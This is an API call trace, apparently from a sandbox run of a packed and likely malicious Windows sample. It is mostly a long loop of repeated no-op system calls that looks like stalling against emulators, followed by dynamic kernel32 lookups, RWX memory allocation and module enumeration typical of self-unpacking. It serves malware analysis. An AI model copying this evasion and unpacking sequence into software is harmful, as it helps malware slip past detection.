	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.353] GetMessageExtraInfo () returned 0x0
	[0026.353] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.353] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.354] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.354] GetMessageExtraInfo () returned 0x0
	[0026.354] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.355] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.355] GetMessageExtraInfo () returned 0x0
	[0026.355] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.355] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.355] GetMessageExtraInfo () returned 0x0
	[0026.355] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.355] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.355] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.360] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.360] GetMessageExtraInfo () returned 0x0
	[0026.360] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.361] GetMessageExtraInfo () returned 0x0
	[0026.361] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.361] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.362] GetMessageExtraInfo () returned 0x0
	[0026.362] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.362] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0028.254] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c20000
	[0028.255] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e
	[0028.288] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f
	[0028.288] VirtualProtect (in: lpAddress=0x7db67c0, dwSize=0x120fc, flNewProtect=0x40, lpflOldProtect=0x18edbc | out: lpflOldProtect=0x18edbc*=0x4) returned 1
	[0028.301] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9
	[0028.302] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410
	[0028.302] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58
	[0028.304] Module32First (hSnapshot=0x58, lpme=0x18fb70) returned 1
	[0028.305] VirtualAlloc (lpAddress=0x0, dwSize=0x18050, flAllocationType=0x1000, flProtect=0x40) returned 0x210000
	[0028.309] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7
	[0028.309] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000
	[0028.309] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856
	[0028.309] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f
	[0028.309] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e
	[0028.310] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519
